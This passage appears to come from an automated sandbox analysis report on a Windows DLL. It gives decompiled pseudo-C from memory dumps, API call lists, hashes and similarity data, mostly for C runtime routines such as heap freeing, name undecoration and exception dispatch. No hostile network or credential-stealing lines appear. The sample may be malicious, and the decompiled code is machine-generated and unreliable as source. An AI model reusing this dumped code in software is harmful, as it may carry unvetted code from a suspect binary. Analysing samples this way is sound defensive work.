                                									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                									__eflags = _t78 - _t72;
                                									if(_t78 < _t72) {
                                										goto L46;
                                									}
                                									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                										goto L46;
                                									}
                                									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                										goto L20;
                                									}
                                									goto L46;
                                								}
                                							} else {
                                								goto L16;
                                							}
                                							while(1) {
                                								L16:
                                								__eflags =  *((intOrPtr*)(0x6dd44200 + _t58 * 4)) - _t110;
                                								if( *((intOrPtr*)(0x6dd44200 + _t58 * 4)) == _t110) {
                                									break;
                                								}
                                								_t58 = _t58 + 1;
                                								__eflags = _t58 - _t81;
                                								if(_t58 < _t81) {
                                									continue;
                                								}
                                								goto L18;
                                							}
                                							__eflags = _t58;
                                							if(_t58 <= 0) {
                                								goto L5;
                                							}
                                							 *0x6dd44240 = 1;
                                							__eflags =  *0x6dd44240;
                                							if( *0x6dd44240 != 0) {
                                								goto L5;
                                							}
                                							__eflags =  *((intOrPtr*)(0x6dd44200 + _t58 * 4)) - _t110;
                                							if( *((intOrPtr*)(0x6dd44200 + _t58 * 4)) == _t110) {
                                								L32:
                                								_t100 = 0;
                                								__eflags = _t58;
                                								if(_t58 < 0) {
                                									L34:
                                									 *0x6dd44240 = 0;
                                									goto L5;
                                								} else {
                                									goto L33;
                                								}
                                								do {
                                									L33:
                                									_t90 = 0x6dd44200 + _t100 * 4;
                                									_t100 = _t100 + 1;
                                									__eflags = _t100 - _t58;
                                									 *_t90 = _t110;
                                									_t110 =  *_t90;
                                								} while (_t100 <= _t58);
                                								goto L34;
                                							}
                                							_t58 = _t81 - 1;
                                							__eflags = _t58;
                                							if(_t58 < 0) {
                                								L28:
                                								__eflags = _t81 - 0x10;
                                								if(_t81 < 0x10) {
                                									_t81 = _t81 + 1;
                                									__eflags = _t81;
                                									 *0x6dd441f8 = _t81;
                                								}
                                								_t58 = _t81 - 1;
                                								goto L32;
                                							} else {
                                								goto L25;
                                							}
                                							while(1) {
                                								L25:
                                								__eflags =  *((intOrPtr*)(0x6dd44200 + _t58 * 4)) - _t110;
                                								if( *((intOrPtr*)(0x6dd44200 + _t58 * 4)) == _t110) {
                                									break;
                                								}
                                								_t58 = _t58 - 1;
                                								__eflags = _t58;
                                								if(_t58 >= 0) {
                                									continue;
                                								}
                                								break;
                                							}
                                							__eflags = _t58;
                                							if(__eflags >= 0) {
                                								if(__eflags == 0) {
                                									goto L34;
                                								}
                                								goto L32;
                                							}
                                							goto L28;
                                						}
                                						_t75 =  *((intOrPtr*)(_t108 - 8));
                                						__eflags = _t75 - _v8;
                                						if(_t75 < _v8) {
                                							goto L20;
                                						}
                                						__eflags = _t75 - _t108;
                                						if(_t75 >= _t108) {
                                							goto L20;
                                						}
                                						goto L15;
                                					}
                                					L5:
                                					_t63 = 1;
                                					goto L60;
                                				} else {
                                					goto L3;
                                				}
                                			}


                                APIs
                                • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6DD42536
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp
                                Similarity
                                • API ID: MemoryQueryVirtual
                                • String ID:
                                • API String ID: 2850889275-0
                                • Opcode ID: 96b2f6015d97ff77d34982e80764f69f8f71b76aaa6884052c600f07282c0832
                                • Instruction ID: 0032f46ce0b36bae695d03626f0ffd86700c754ca246b352f3a2af5039e94a10
                                • Opcode Fuzzy Hash: 96b2f6015d97ff77d34982e80764f69f8f71b76aaa6884052c600f07282c0832
                                • Instruction Fuzzy Hash: A661D330604603CFEB25FF29D8A0B697BB5EB8A36CF24C069F555C7295E770D882CA50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6DD8EBCC
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: FeaturePresentProcessor
                                • String ID:
                                • API String ID: 2325560087-0
                                • Opcode ID: 8399dbedc6643d5035f8911d2a09f0a3c5c09e8196cef12fa6ce23f63f88faa6
                                • Instruction ID: 3946e573d2b9afeb50d2385d38a0b35eabd3c08644cca2d69fd8248fe0e0da87
                                • Opcode Fuzzy Hash: 8399dbedc6643d5035f8911d2a09f0a3c5c09e8196cef12fa6ce23f63f88faa6
                                • Instruction Fuzzy Hash: 8051C4B1D0461ACFEB25DF98C9817AAB7F9FB45310F10852AE454E7246D376D900DF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: 204e91fa5c05923e34111fde3f89cb4aadedbb72d814df838c61e1a58f82d811
                                • Instruction ID: fbf0982ccf0acf997ec7a5a9596f1bf8caa635251f8005cdff79544c9fd1c630
                                • Opcode Fuzzy Hash: 204e91fa5c05923e34111fde3f89cb4aadedbb72d814df838c61e1a58f82d811
                                • Instruction Fuzzy Hash: 7F61553164820AD7EB14BB28C890BBE73A5AF46304FCCC51AF992DB5C2D7639942C315
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: a8260bac03ee4dfd0c900f68f53ac5e39c0acae119282dbe163888cfff0ffc0b
                                • Instruction ID: b4e30494064b8c5828042acff901283f28d587caede6b495dbe0dcc08b877b75
                                • Opcode Fuzzy Hash: a8260bac03ee4dfd0c900f68f53ac5e39c0acae119282dbe163888cfff0ffc0b
                                • Instruction Fuzzy Hash: E4516E316086CAD6DB25BB78C8907BEBB99AB42304F0CC51AFDC1DB2C2DB1599458367
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: b8b6aa48bda707f2869db1882f7404d1c9cfba8873232cbf7aae36e10b2864e4
                                • Instruction ID: 5ffb572b916adc7fa560e0ba823e5a2f08671db88320e23009c6bbc48c080a2e
                                • Opcode Fuzzy Hash: b8b6aa48bda707f2869db1882f7404d1c9cfba8873232cbf7aae36e10b2864e4
                                • Instruction Fuzzy Hash: 3A519D706486CAD6EB25BB38C890BBE77A5AB02348F8CC51EFDC2DB282D711D945C751
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID: 0
                                • API String ID: 0-4108050209
                                • Opcode ID: a509ba99d373decff709b22e6fca3f615ad7e4a2bc2872a165842f100db95bba
                                • Instruction ID: 072175daa479c1f26ed618e38ec021ff7d70b398e83ed1680b6565576641ed20
                                • Opcode Fuzzy Hash: a509ba99d373decff709b22e6fca3f615ad7e4a2bc2872a165842f100db95bba
                                • Instruction Fuzzy Hash: C6514EB06497CADADB257B28C8907BF77A9BB02304F0CC41BFD82D7282D716A945C765
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: aef982abe2e2fe854ce0ccadbe68bcd8cb438b2fb4ed715b81cf3ac230f1b03f
                                • Instruction ID: 0fb4c952085c4b8e70577e54311618129228a46c59538dfb3e0cf1ce29f79522
                                • Opcode Fuzzy Hash: aef982abe2e2fe854ce0ccadbe68bcd8cb438b2fb4ed715b81cf3ac230f1b03f
                                • Instruction Fuzzy Hash: 70027172E00225DFDB26DF18CC80BAAB7F9BF46304F0550EAE959EB245D7319A818F51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e74aa3320ab272d860531c0462d2b1e210bc55940e259d0d69b6b34226ca01fe
                                • Instruction ID: 9746df04206f90b9396f2613e31b795f0bc9eb72ac4a3a692cce5521595ace40
                                • Opcode Fuzzy Hash: e74aa3320ab272d860531c0462d2b1e210bc55940e259d0d69b6b34226ca01fe
                                • Instruction Fuzzy Hash: DCE1B671A01229DFDB25EF58CC80BAAB7B8FF46304F0441E9E949EB245D7319E808F91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ea0471af2724854eadb6ab7024eb6c73c22b1225586173b8329e02d7ba345dd8
                                • Instruction ID: 045ff46d973ea13be4a89d913ad89cdf20125e4095e46a21d036e4ca55e88c8c
                                • Opcode Fuzzy Hash: ea0471af2724854eadb6ab7024eb6c73c22b1225586173b8329e02d7ba345dd8
                                • Instruction Fuzzy Hash: F1918D71A002698BDB25EF58C880BEDB7B5FFC9304F1540EAE909EB245E7719E418F90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dd16bbd6c326d4e8212feb0afa906c0b57185bc48de0426693217f9c8ca3e5cb
                                • Instruction ID: e9927c3b657bc7b77e53ead2d0e920f5885610cc82a6e2943224e3ab3d38b4f6
                                • Opcode Fuzzy Hash: dd16bbd6c326d4e8212feb0afa906c0b57185bc48de0426693217f9c8ca3e5cb
                                • Instruction Fuzzy Hash: C8518171E00219EFDF04DF99C990AEEBBB2FF88304F1A8159E515AF241C735AA51CB91
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1310b8fd10497e5dfeeaeff4178988b853285d99a9bd4cf6c9598b8bba0169bd
                                • Instruction ID: 1e647d41219ee0ac73f7438c7e4cd28424ce59e9c7dbbf2045ea59774fd7f94a
                                • Opcode Fuzzy Hash: 1310b8fd10497e5dfeeaeff4178988b853285d99a9bd4cf6c9598b8bba0169bd
                                • Instruction Fuzzy Hash: 0321B373F204394B7B0CC47E8C522BDB6E1C68C511745823AF9A6EA2C1D968D917E2E4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 24156c0ab310ec2f201cffc2243c3d5f88f5dcdb67a6c6aa581c9051b3307511
                                • Instruction ID: a354028196bac8cb050342d1b69097f4c036b68ea23169a6feb71ed225857e82
                                • Opcode Fuzzy Hash: 24156c0ab310ec2f201cffc2243c3d5f88f5dcdb67a6c6aa581c9051b3307511
                                • Instruction Fuzzy Hash: 1111A763F30C255A675C81BD8C1326A96D2EBD825070F433AD826E7284E9A4DE23D290
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 71%
                                			E6DD42264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
                                				intOrPtr _v8;
                                				char _v12;
                                				void* __ebp;
                                				signed int* _t43;
                                				char _t44;
                                				void* _t46;
                                				void* _t49;
                                				intOrPtr* _t53;
                                				void* _t54;
                                				void* _t65;
                                				long _t66;
                                				signed int* _t80;
                                				signed int* _t82;
                                				void* _t84;
                                				signed int _t86;
                                				void* _t89;
                                				void* _t95;
                                				void* _t96;
                                				void* _t99;
                                				void* _t106;
                                
                                				_t43 = _t84;
                                				_t65 = __ebx + 2;
                                				 *_t43 =  *_t43 ^ __edx ^  *__eax;
                                				_t89 = _t95;
                                				_t96 = _t95 - 8;
                                				_push(_t65);
                                				_push(_t84);
                                				_push(_t89);
                                				asm("cld");
                                				_t66 = _a8;
                                				_t44 = _a4;
                                				if(( *(_t44 + 4) & 0x00000006) != 0) {
                                					_push(_t89);
                                					E6DD423CB(_t66 + 0x10, _t66, 0xffffffff);
                                					_t46 = 1;
                                				} else {
                                					_v12 = _t44;
                                					_v8 = _a12;
                                					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
                                					_t86 =  *(_t66 + 0xc);
                                					_t80 =  *(_t66 + 8);
                                					_t49 = E6DD42485(_t66);
                                					_t99 = _t96 + 4;
                                					if(_t49 == 0) {
                                						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
                                						goto L11;
                                					} else {
                                						while(_t86 != 0xffffffff) {
                                							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
                                							if(_t53 == 0) {
                                								L8:
                                								_t80 =  *(_t66 + 8);
                                								_t86 = _t80[_t86 + _t86 * 2];
                                								continue;
                                							} else {
                                								_t54 =  *_t53();
                                								_t89 = _t89;
                                								_t86 = _t86;
                                								_t66 = _a8;
                                								_t55 = _t54;
                                								_t106 = _t54;
                                								if(_t106 == 0) {
                                									goto L8;
                                								} else {
                                									if(_t106 < 0) {
                                										_t46 = 0;
                                									} else {
                                										_t82 =  *(_t66 + 8);
                                										E6DD42370(_t55, _t66);
                                										_t89 = _t66 + 0x10;
                                										E6DD423CB(_t89, _t66, 0);
                                										_t99 = _t99 + 0xc;
                                										E6DD42467(_t82[2]);
                                										 *(_t66 + 0xc) =  *_t82;
                                										_t66 = 0;
                                										_t86 = 0;
                                										 *(_t82[2])(1);
                                										goto L8;
                                									}
                                								}
                                							}
                                							goto L13;
                                						}
                                						L11:
                                						_t46 = 1;
                                					}
                                				}
                                				L13:
                                				return _t46;
                                			}
























                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp Download File
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                • Instruction ID: 895f8273d696002984db49311f8f91de53d6c45458b51953299b18e89e499622
                                • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                • Instruction Fuzzy Hash: 4B2195329042059BCB10EF68C8949A7BBB5FF49354B46C198E955DB246D730F915C7E0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.495143690.000000006DDCE000.00000040.00020000.sdmp, Offset: 6DDCE000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                • Instruction ID: 38b4bb7381aacd2ba55ac5c9a731970e50bbbfe75c3b277459d51fd8e1d01bcb
                                • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                • Instruction Fuzzy Hash: A11181B33441019FD714EF59DC82EA6B3DEFB89231B258166ED08CB305E635E841C7A0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.495143690.000000006DDCE000.00000040.00020000.sdmp, Offset: 6DDCE000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                                • Instruction ID: 7a8836888b2302955b76f2931b70707662734cc8112c167da8cbfed6f29d07e1
                                • Opcode Fuzzy Hash: d6db8e1f961792d163c78665be140d0242f94593fd5b6291162898feff87c4c3
                                • Instruction Fuzzy Hash: 7B0126B6314241CFD705EB19D985D79BBECEBC2324F15C07EE446C3656D134E441C912
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ecb42c1d12d40f1a0af8a500848935c0d28a4c93e3a3cea091b94fc400f67602
                                • Instruction ID: 359ee653edfd21f548a2fbeabe670b61eb05251096046e6809f2e2494d3500e4
                                • Opcode Fuzzy Hash: ecb42c1d12d40f1a0af8a500848935c0d28a4c93e3a3cea091b94fc400f67602
                                • Instruction Fuzzy Hash: A9E08CB2911228EBCB20EB88C900E9AF7FCEB46A48B51099AB602D3500C270EE01C7D0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
                                • String ID: )
                                • API String ID: 1186856153-2427484129
                                • Opcode ID: dcf5b4da51cef750e4ae8df36a058142d1d408c272480f5e88e43424202cc152
                                • Instruction ID: 3bc7330bb742d465ff6f13a91f0681dca24833b01e951d3761dc80f48b1512f1
                                • Opcode Fuzzy Hash: dcf5b4da51cef750e4ae8df36a058142d1d408c272480f5e88e43424202cc152
                                • Instruction Fuzzy Hash: 83C182B1914209AFDF04EFE8D890EED7BB9BB09314F014159F265AF281DB32A545CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DName::operator+.LIBCMT ref: 6DD955CC
                                • DName::operator+.LIBCMT ref: 6DD95702
                                  • Part of subcall function 6DD9148F: shared_ptr.LIBCMT ref: 6DD914AB
                                • DName::operator+.LIBCMT ref: 6DD9574E
                                • DName::operator+.LIBCMT ref: 6DD9575D
                                • DName::operator+.LIBCMT ref: 6DD956B8
                                  • Part of subcall function 6DD96CAB: DName::operator=.LIBVCRUNTIME ref: 6DD96D3A
                                • DName::operator+.LIBCMT ref: 6DD9588A
                                • DName::operator=.LIBVCRUNTIME ref: 6DD958CA
                                • DName::DName.LIBVCRUNTIME ref: 6DD958E2
                                • DName::operator+.LIBCMT ref: 6DD958F1
                                • DName::operator+.LIBCMT ref: 6DD958FD
                                  • Part of subcall function 6DD96CAB: Replicator::operator[].LIBVCRUNTIME ref: 6DD96CE8
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
                                • String ID:
                                • API String ID: 1026175760-0
                                • Opcode ID: eb022362e71cc8342685466d94dada893d1cac2601da5eb31aa76c4c9c2b1fcd
                                • Instruction ID: a2cccca70907ee3c5f19b957b453099357f33cb8de4312c8cd4831cb50355f6e
                                • Opcode Fuzzy Hash: eb022362e71cc8342685466d94dada893d1cac2601da5eb31aa76c4c9c2b1fcd
                                • Instruction Fuzzy Hash: BAC16F71908205DFDB14EFA8D854BFEBBF9BB09305F00446DF659AB281EB36A644CB50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • ___free_lconv_mon.LIBCMT ref: 6DDB7CAC
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB92D8
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB92EA
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB92FC
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB930E
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB9320
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB9332
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB9344
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB9356
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB9368
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB937A
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB938C
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB939E
                                  • Part of subcall function 6DDB92BB: _free.LIBCMT ref: 6DDB93B0
                                • _free.LIBCMT ref: 6DDB7CA1
                                  • Part of subcall function 6DDAD7F5: HeapFree.KERNEL32(00000000,00000000,?,6DDB9A83,?,00000000,?,?,?,6DDB9D87,?,00000007,?,?,6DDB7DFF,?), ref: 6DDAD80B
                                  • Part of subcall function 6DDAD7F5: GetLastError.KERNEL32(?,?,6DDB9A83,?,00000000,?,?,?,6DDB9D87,?,00000007,?,?,6DDB7DFF,?,?), ref: 6DDAD81D
                                • _free.LIBCMT ref: 6DDB7CC3
                                • _free.LIBCMT ref: 6DDB7CD8
                                • _free.LIBCMT ref: 6DDB7CE3
                                • _free.LIBCMT ref: 6DDB7D05
                                • _free.LIBCMT ref: 6DDB7D18
                                • _free.LIBCMT ref: 6DDB7D26
                                • _free.LIBCMT ref: 6DDB7D31
                                • _free.LIBCMT ref: 6DDB7D69
                                • _free.LIBCMT ref: 6DDB7D70
                                • _free.LIBCMT ref: 6DDB7D8D
                                • _free.LIBCMT ref: 6DDB7DA5
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                • String ID:
                                • API String ID: 161543041-0
                                • Opcode ID: bd37b72ab5bb8c4c4b12126f2e4ea6c91c66e8b1b75bb6d81f23fe8889293b9b
                                • Instruction ID: a933f6890e5826e287bf5ae7985ce20825720a477a5235f7377cd321d71c8d6b
                                • Opcode Fuzzy Hash: bd37b72ab5bb8c4c4b12126f2e4ea6c91c66e8b1b75bb6d81f23fe8889293b9b
                                • Instruction Fuzzy Hash: 86314DB1908702FFE724AB39D944B6A73E9EB44258F118419F55A96151FF30E885C760
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • IsInExceptionSpec.LIBVCRUNTIME ref: 6DD8FF75
                                • type_info::operator==.LIBVCRUNTIME ref: 6DD8FF9C
                                • ___TypeMatch.LIBVCRUNTIME ref: 6DD900A8
                                • CatchIt.LIBVCRUNTIME ref: 6DD900FD
                                • IsInExceptionSpec.LIBVCRUNTIME ref: 6DD90183
                                • _UnwindNestedFrames.LIBCMT ref: 6DD9020A
                                • CallUnexpected.LIBVCRUNTIME ref: 6DD90225
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                • String ID: csm$csm$csm
                                • API String ID: 4234981820-393685449
                                • Opcode ID: 2f1c85efa4cb412bdc67dfa1e91033192bb6a181564d1094bfa275424c44ec40
                                • Instruction ID: f1e6006f30fc31db39b1b4587966896a6ac98a23e3aaaa0413067bbbea9f6808
                                • Opcode Fuzzy Hash: 2f1c85efa4cb412bdc67dfa1e91033192bb6a181564d1094bfa275424c44ec40
                                • Instruction Fuzzy Hash: 99C1893180421ADFCF16EFA9E8809AEBBB5FF04354F11405AF914AF216D332DA55CBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DName::operator+.LIBCMT ref: 6DD9611F
                                • UnDecorator::getSignedDimension.LIBCMT ref: 6DD9612A
                                • DName::DName.LIBVCRUNTIME ref: 6DD9613B
                                • UnDecorator::getSignedDimension.LIBCMT ref: 6DD961E0
                                • UnDecorator::getSignedDimension.LIBCMT ref: 6DD961FD
                                • UnDecorator::getSignedDimension.LIBCMT ref: 6DD9621A
                                • DName::operator+.LIBCMT ref: 6DD9622F
                                • UnDecorator::getSignedDimension.LIBCMT ref: 6DD96252
                                • swprintf.LIBCMT ref: 6DD962C3
                                • DName::operator+.LIBCMT ref: 6DD9631A
                                  • Part of subcall function 6DD941AA: DName::DName.LIBVCRUNTIME ref: 6DD941CE
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$swprintf
                                • String ID:
                                • API String ID: 3689813335-0
                                • Opcode ID: 7e0d4f837fa631bd79aec53c5172e83d49e4fe8cc1b47f20200fd2536e555688
                                • Instruction ID: 143d6844e19f7cc4b4b107aba87f51963a609be733fc7fe547bf6fca3a3b331c
                                • Opcode Fuzzy Hash: 7e0d4f837fa631bd79aec53c5172e83d49e4fe8cc1b47f20200fd2536e555688
                                • Instruction Fuzzy Hash: DB81B372D5420ADAEB11FBF4C955BFE77B8AB06314F458019F214AF082DB7A6604CBE1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • _free.LIBCMT ref: 6DDADB7A
                                  • Part of subcall function 6DDAD7F5: HeapFree.KERNEL32(00000000,00000000,?,6DDB9A83,?,00000000,?,?,?,6DDB9D87,?,00000007,?,?,6DDB7DFF,?), ref: 6DDAD80B
                                  • Part of subcall function 6DDAD7F5: GetLastError.KERNEL32(?,?,6DDB9A83,?,00000000,?,?,?,6DDB9D87,?,00000007,?,?,6DDB7DFF,?,?), ref: 6DDAD81D
                                • _free.LIBCMT ref: 6DDADB86
                                • _free.LIBCMT ref: 6DDADB91
                                • _free.LIBCMT ref: 6DDADB9C
                                • _free.LIBCMT ref: 6DDADBA7
                                • _free.LIBCMT ref: 6DDADBB2
                                • _free.LIBCMT ref: 6DDADBBD
                                • _free.LIBCMT ref: 6DDADBC8
                                • _free.LIBCMT ref: 6DDADBD3
                                • _free.LIBCMT ref: 6DDADBE1
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: c756b1fab33d3bf3e00751e928d3ea7f89694edadca7b19e69b415233efbbfbd
                                • Instruction ID: 53d34b90cf320488d7e3b57f9225b25d1181a56cc02eb634cd020c329aad0c75
                                • Opcode Fuzzy Hash: c756b1fab33d3bf3e00751e928d3ea7f89694edadca7b19e69b415233efbbfbd
                                • Instruction Fuzzy Hash: 7521BA7A904108FFCB15EFA8C980DDD7BB8BF48254F058166FA159B120FB31EA45CB90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • Replicator::operator[].LIBVCRUNTIME ref: 6DD96CE8
                                • DName::operator=.LIBVCRUNTIME ref: 6DD96D3A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: Name::operator=Replicator::operator[]
                                • String ID: @
                                • API String ID: 3211817929-2766056989
                                • Opcode ID: 0245af66ce838d22d75d313f946eda04cb0b34331c4e3da893dab8caa9b05792
                                • Instruction ID: b81fe77fca27824ec822c52a6877e7d82efa9f00715cc0e22d6a50f1cb8977cd
                                • Opcode Fuzzy Hash: 0245af66ce838d22d75d313f946eda04cb0b34331c4e3da893dab8caa9b05792
                                • Instruction Fuzzy Hash: E7618371D0420A9FDF05EFE9D840BFEBBB9AB19314F01805AF655AB281DB35A505CBE0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • DName::operator+.LIBCMT ref: 6DD928BF
                                • DName::operator+.LIBCMT ref: 6DD92912
                                  • Part of subcall function 6DD9148F: shared_ptr.LIBCMT ref: 6DD914AB
                                  • Part of subcall function 6DD9137E: DName::operator+.LIBCMT ref: 6DD9139F
                                • DName::operator+.LIBCMT ref: 6DD92903
                                • DName::operator+.LIBCMT ref: 6DD92963
                                • DName::operator+.LIBCMT ref: 6DD92970
                                • DName::operator+.LIBCMT ref: 6DD929B7
                                • DName::operator+.LIBCMT ref: 6DD929C4
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
